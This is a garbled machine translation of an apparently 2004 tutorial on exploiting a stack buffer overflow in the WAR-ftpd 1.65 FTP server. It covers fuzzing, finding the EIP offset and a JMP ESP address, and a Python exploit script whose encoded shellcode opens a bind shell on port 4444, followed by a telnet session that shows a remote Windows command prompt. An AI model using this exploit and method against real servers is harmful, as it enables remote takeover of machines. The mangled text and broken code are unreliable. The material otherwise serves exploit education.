Win32 buffer overflows actual combat

xiaoxiao2021-03-06 40

Disclaimer: It turned out to be a document in the PDF format. I took some time to handle it into a text document. Phantom Brigade overflow learning materials cloie # www.ph4nt0m.orgWin32 buffer overflow combat text: "Intro to Win32 Exploits" Author: Sergio Alvarez 2004.09.05 Translator: ph4nt0m.org 2004.10.30 First, the preamble is many times cloie # Friends invited to write articles on Exploit under Win32. One is because there are many * NIX platforms in such articles, while Win32 is relatively small; second is because in Win32 is written in Exploit, some places may be difficult. Here, I will use a specific simple example, detailed analysis of the discovery mining, debugging and Exploit writing utilization, and select a Stack buffer overflow vulnerability of 'WAR-ftpdvl.65'. First, you need to prepare the following practical tools: python - www.python.orgpyopenssl - http://pyopenssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssSL - http://home.t-online.de/ollydbg/ollyuni by fx of pohenoelit - http: //www.phenoelit.dewar-ftpd version 1.65 by jgaa - http://www.jgaa.comfuzzer VL.0 - http://hack3rs.org/~shadown/twister/ (Translator Note) Because Pyopenssl can find Python 2.2.x's Win32 compiling version, so Python installed 2.2.x will be more convenient. Second, the excavation vulnerability can debug in real time in the vulnerability excavation process, you can know what happened. Below with ollydbg Open the program to debug 'WAR-ftpd VL.65': ♦ Run 'ollydbg' ♦ File-> Open (or Press F3) ♦ Browse to the Directory where 'WAR-ftpd VL.65' is installed and then select 'WAR -ftpd.exe 'file ♦ Debug-> Run (or PRESS F9) ♦ Run in the WAR-FTP window menu -> Start Service' After starting the program, there may be some explainations, follow the prompts (SHIFT F7 / F8 / F9 ) Skip. Regardless of the OLLYDBG (other debug tool is also the same), the process will be suspended by the debugger, and we need to continue running.

OK, now WAR-ftpd has been run, let's use Fuzzer to help us excavate the software vulnerability: c: / fuzzer> Fuzzer.py ############ ################# Net-twister fuzzermodule ## code by sergio 'shadown' alvarez ############################################################################################################################################################################################################################################ ################### usage: c: /fuzzer/fuzzer.py Protocols Available: SMTP, FTP, POP3 We choose FTP mode Test: c: / fuzzer> Fuzzer.py 192.168.178.129 21 FTP See the following display information: <**> it is suppose to recv something, but recv nothing checkit! <**> or as follows: <* *> Bug Found !!!;)) <**> -> Sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Let's look at the status bar at the bottom of Ollydbg, show 'Access Violation when executing [41414141] ..' information, the upper right corner of the window display EIP is addressed to 41,414,141, which means, USER command FTP authentication portion of There is a buffer overflow, and the long string covers the EIP.

Next, we will keep trying to debug this bug. Since each debug can cause the WAR-FTPD process to die, you can reboot the process through 'debug-> restart'. Third, the debug vulnerability discovers the software vulnerability, we can change the original running process of the program by overwriting the EIP, and jump to run the shellcode we arrange. To achieve this, you must know that two elements, how long the string can be overridden to EIP, and there is what we arrange the shellcode where it is. This is very similar to Linux, of course, we will also see some unique part of Win32. As seen above, now covering the EIP is 41414141, how many long buffers can cover the EIP in memory? I wrote a simple script 'reacheip.py', which can be generated as a digitally arranged buffer, and can modify the number of numbers and lengths by modifying the parameters, so that we can find the buffer length you need to build. The simple principle of the script is as follows, here we first assume that the register size is 1byte: a. First production of the following digital strings 1234567891234567891234567891897B. Then we see that a number covers the EIP (assuming the EIP size is 1byte), assume that it is 2, then we rebuild numbers Strings, only the position where the original number 2 is located, the other position numbers are ignored or unchanged. c. Now a number overrides the EIP, assuming 4 so we can calculate the true length of the buffer for writing Exploit. (Translator Note: Because it simply explains the feature of the script, this author does not mention that this number 4 is the first few in the array. The X86 machine is 4Byte, so we will extend the above digital string. The same arrangement is the same as 4 numbers. In the actual debug, I found that sometimes it is not just the same four numbers covering the EIP, such as 4445, so we add an align character in the beginning of Buffer, such as A. Squeezing the buffer, this to cover the number of EIP The string is 4444.

With the build buffer feature of 'Reacheip.py' scripts, you also need to send and receive functions (network sending and reception), which uses' reacheip.py 'as a' library ', re-combining new script' reachwar-ftpd. Py ', used to debug war-ftpd: Detail of this script: C: / Fuzzer> Reach_war-fpd.pyusage: c: / fuzzer> Reach_war-ftpd.py < Toreach> Host: Target Host's address port: Port Align at the target host ALIGN: Plug data before the digital string (1 - 3) Phantom brigade overflow learning materials CLOIE # www. PH4NT0M.ORGTOREACH: Numbers (1-9) Repeat (1-9) in the new numeric string (1-9) Repeat: Build a number of digital strings (refer to a number of digital strings after modifying the rebuilt) Cycles: Substance (1-2) firstReached : The previously replaced number (1-9) The following is a practical battle to WAR-FTPD: First, the initial number string is 111122233333 ... Similar, repeated 200 times, total digital string is 4 * 200 = 800: C: / fuzzer> Reach_war-ftpd.py 192.168.178.129 21 0 0 200 1 0220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter your user name.buffer size: 800331 user name okay, need password. At this time Ollydbg, see information display information 'Access Violation when Executing [36353535]', overridden EIP is 36353535, apparent that we need to move the digital string in buffer to enable it to make Numeral strings of EIP 35353535. Hex hexadecimal numbers displayed here, we can get the HEX value corresponding to each letter or digital corresponding from the ASCII table, such as '1' = 31, '2' = 32, '3' = 33, '4' = 34, '5' = 35, ..., '9' = 39, if in the Linux system, you can directly enter the command 'man ascii' to view the corresponding table.

After adjusting, then the digital string is A111122233333 ...: c: / fuzzer> reach_war-ftpd.py 192.168.178.129 21 1 0 200 1 0220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter your User Name.buffer size: 801331 user name okay, NEED Password. This time you look at OLLYDBG, see the information display information 'Access Violation when Executing [35353535]', it seems that the number 5 is what we need to replace, replace it. It turned out that the 5555 local use 1111, 2222, 3333, ... replace, other positions of the number irrelevant to use A replacement: c: / fuzzer> Reach_war-ftpd.py 192.168.178.129 21 1 5 20 1 0220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter User Name.buffer Size: 737331 User Name Okay, Need Password.check IN obg! This time you see OLLYDBG, as shown in the following picture or 5555, we also need the second time Replace it, the location of 5555 in the last buffer is replaced by 1111, 2222, 3333, ...: c: / fuzzer> Reach_war-ftpd.py 192.168.178.129 21 1 5 10 2 5220-JGAA's Fan Club FTP Service War- FTPD 1.65 Ready 220ples ENTER YOUR NAME.BUFFER SIZE: 3401331 User Name Okay, Need Password.check IN OLLYDBG! This time you look at Ollydbg, as shown below 32323232, that is, 2222, so that we can get the need for Buffer to cover the EIP.

First get out of 'Reachwar-ftpd.py', use 'reacheip.py' to print this time Buffer: C: / Fuzzer> Reach_war-ftpd.py 1 5 10 2 5Buffer Size: ... (unrelated display below) Then copy 2222 to copy (Win2K CMD) Mouse circle, the transport copied into memory, where the need to paste right), used to prepare the following: C: / fuzzer> python -c "printlen ( 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')" 485 so we get we want to know Length 485.

A simpler method is the direct use 'reacheip.py', in fact, the principle is the same, otherwise the same parameters can be modified to obtain: C: / fuzzer> reach_eip.py 1 5 1 2 5Buffer size: 485AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Now we know the length of the buffer We can initially debug to use this vulnerability. Constructing the shape of 'user' '485 bytes long string' 'a test return, actually, such as' triggerdeadbeef.py' script: c: / fuzzer> Type Trigger_deadbeef.pyimport structprint 'user' '/ x41' * 485 struct.pack ( ' trigger_deadbeef.py | nc 192.168.178.129 21220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready220 Please enter your user Name.331 User Name Okay, NEED Password. Press CTRL C to stop 'NC' at this time, display information as 'Access Violation when Executing [Deadbeef]' in OllyDBG, which seems to cover the EIP. Next, do the second step, look for the position of Shellcode, where Linux is different from Win32. As can be seen from above, the address in the stack is similar to 0x00A4FDD0. It is not appropriate to cover EIP with such address values, because the 0x00 is included, and cannot be used for RET Address. Look carefully in Stack (OllyDBG in the lower right corner window), found that the address of the ESP follows the not far from the EIP, and the 4 BYTES is separated. This is another Roman Avenue in the Win32 (Detailed Principle Analysis See www.nsfocus.net "Classic Articles), put shellcode starts place at this time, in the EIP location coverage with an address of 'JMP ESP' This will be able to perform our shellcode very well. But how do you find the address of 'JMP ESP'? You can search for a value for a particular system on the Internet, there are also some universal addresses.

Here is a way to get a plug-in that it is available on its own system, which uses Ollydbg's plug, ie ollyuni.dll copies OLLYUNI.DLL to the ollydbg directory, use the left window to the left window in ollydbg, select 'Overflow return Address-> Ascii Overflow Returns-> Search JMP / Callesp ', as shown below: Search Time will have a little longer, end' view-> log ', see a lot of address values, select one without 0x00. PS, using Lion of Sac.exe to achieve the same effect.

Fourth, vulnerability utilization (ExPloit) A simple utilization script is as follows: c: / fuzzer> type exp_beta.pyimport structsc = "/ x24 / xd9 / x74 / x24 / xf4 / x5b / x31 / xc9 / xb1 / x5e / x81 / x73 / x17 / xe0 / x66 "sc =" / x1c / xc2 / x83 / Xeb / XFC / XE2 / XF4 / X1C / X8E / X4A / XC2 / XE0 / X66 / X4F / X97 / XB6 "SC =" / X31 / X97 / XAE / XC4 / X7E / X97 / X87 / XDC / XED / X48 / XC7 / X98 / X67 / XF6 / X49 / XAA "SC =" / X7E / X97 / X98 / XC0 / X67 / XF7 / X21 / XD2 / X2F / X97 / XF6 / X6B / X67 / XF2 / XF3 / X1F "SC =" / X9A / X2D / X02 / X4C / X5E / XFC / XB6 / XE7 / XA7 / XD3 / XCF / XE1 / XA1 / xf7 / x30 / xdb "sc =" / x1a / x38 / xd6 / x95 / x87 / x97 / x98 / xc4 / x67 / x57 / x49 / xba "sc =" / x7a / X1D / X29 / XC3 / X08 / X8D / X1E / XF3 / X20 / X39 / X42 / X9F / XBB "SC =" / XA4 / X14 / XC2 / XBE / X0C / X2C / X9B / X84 / XED / X05 / X49 / XBB / X6A / X97 / X99 / XFC "SC =" / XED / X07 / X49 / XBB / X6E / X4F / XAA / X6E / X28 / X12 / X2E / X1F / XB0 / X95 / X05 / X61 "SC =" / x8a / x1c / xc3 / x2 / x66 / x4b / x94 / xb3 / XEF / XF9 / X2A / XC7 / X66 / X1C / XC2 / X70 "SC =" / x67 / x1c / XC2 / X56 / X7F / X04 / X25 / X44 / X7F / X6C / X2B / X05 / X2F / X9A / X8B / X44 "SC =" / X7C / X6C / X05 / X44 / XCB / X32 / X2B / X39 / X6F / XE9 / X6F / X2B / X8B / XE0 / XF9 / XB7 "SC =" / X35 / X2E / X9D / XD3 / X54 / X1C / X99 / X6D / X2D / X3C / X93 / X1F / XB1 / X95 / X1D / x69 "sc =" / xa5 / x 91 / XB7 / XF4 / X0C / X1B / X9B / XB1 / X35 / XE3 / XF6 / X6F / X99 / X49 / XC6 / XB9 "SC =" / XEF / X18 / X4C / X02 / X94 / X37 / XE5 / XB4 / X99 / X2B / X3D / XB5 / X56 / X2D / X02 / XB0 "SC =" / x36 / x4c / x92 / xa0 / x36 / x5c / x92 / x1f / x33 / x30 / x4b / x27 / x57 / xc7 / X91 / XB3 "SC =" / X0E / X1E / XC2 / XF1 / X3A / X95 / X22 / X8A / X76 / X4C / X95 / X1F / X33 / X38 / X91 / XB7 "SC =" / X99 / X49 / XeA / XB3 / X32 / X4B / X3D / XB5 / X88 / X25 / X51 / X86 / XE0 "SC =" / XEF / XDC / X4F / X9C / X42 / XB0 / XA8 / XF5 / X3F / XEF / X69 / X67 "SC ="

/ X9C / X9F / X2E / XB4 / XA0 / X58 / XE6 / XF0 / X22 / X7A / X05 / XA4 / X42 / X20 / XC3 / XE1 "SC =" / XEF / X60 / XE6 / XA8 / XEF / X60 / XE6 / XAC / XEF / X60 / XE6 / XB0 / XEB / X58 / XE6 / XF0 "SC =" / X32 / X4C / X93 / XB1 / X37 / X5D / X93 / XA9 / X37 / X4D / X91 / XB1 / X99 / x69 / xc2 / x88 "sc =" / x14 / xe2 / x71 / xf6 / x99 / x49 / xc6 / x1f / xb6 / x95 / x24 / x1f / x13 / x1c / xaa / x4d "sc =" / XBF / X19 / X0C / X1F / X33 / X18 / X4B / X23 / X0C / XE3 / X3D / XD6 / X99 / XCF / X3D / X95 "SC =" / X66 / X74 / X32 / X6A / X62 / X43 / X3D / XB5 / X62 / X2D / X19 / XB3 / X99 / XCC / XC2 "Print 'User' '/ X41' * 485 Struct.Pack (' Exp_beta.py | NC 192.168.178.129 21220- JGAA's Fan Club FTP Service War-ftpd 1.65 Ready220 please enter your user name. This time Ctrl C stops NC this time, see if there is any successful overflow: C: / Fuzzer> $ Telnet 192.168.178.129 4444trying 192.168.178.129 ... connected to 192.168 .178.129.cape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] (C) CopyRight 19 85-1999 Microsoft Corp.c: / Program Files / War-ftpd> OK, test success ^ _ ^. V. First, the translator is first, thank the author, giving us a detailed article, can be said to be an face, the picture is good, no matter how it praises, I think the authors are well deserved. The article discovery from the vulnerability, vulnerability debugging to the vulnerability, explain how to find the Buffer length, how to find the 'JMP ESP' address, how to write Exploit. For beginners, such articles are worth learning. The phantom brigade overflows the learning materials Cloie # www.ph4nt0m.org, this article is very scalable. For example, determine the buffer length part, if the buffer is too long, the number of replacements exceeds 2 times (I don't know if there is such a situation), assume that ccproxy6.0 http log overflow buffer, you may need to modify reach_eip.py Third replacement.

Similarly, Fuzzer can excavate the WAR-FTPD BUG, or try to dig out the vulnerability of other FTPDs with the same method. For example, the recently released Ability Server 2.34 FTP Stor BufferoverFlow is the practice of this article. Similarly, you can also minimize SMTP or POP. If you test YahoOPOPS 0.6, you can also find the overflow vulnerability of that SMTP. Modify it, you can also support other protocols. The only thing that is not mentioned is that exploit '/ x42' * 32, when debugging, clearly seeing the EIP and ESP differs only 4 bytes, why use 32 Bytes to fill it? This problem has been bothering the translator for a long time, because there is no English version of the author's other articles, so he has said that this issue in other articles is also said. Later, the fantasy meat help, from single-step execution, see what happened, finally understand the 32 BYTES here is actually related to Shellcode. Looking at the SCs on the top, there is a machine code '/ x5b', the assessment sentence is' POP EBX ', it may be associated with the value of other registers, and the quote of' INC is EDX ', as for how to associate, please ask your master to answer. If you change a shellcode, you only need 4 BYTES's data filled, so, the ideas will be clear, don't be confused by the 32 Bytes. I have been translated this article on the weekend, and I am particularly grateful for all members of the phantom. Thanks to the netizens who have given a help in the process of translator, thank you. Translation is not correct, please correct it. Finally ipxodi predecessors recommended an aphorism let us encourage one another: "If you assume that there's no hope, you guarantee there will be no hope.If you assume that there is an instinct for freedom, there are opportunities tochange things." - Noam Chomsky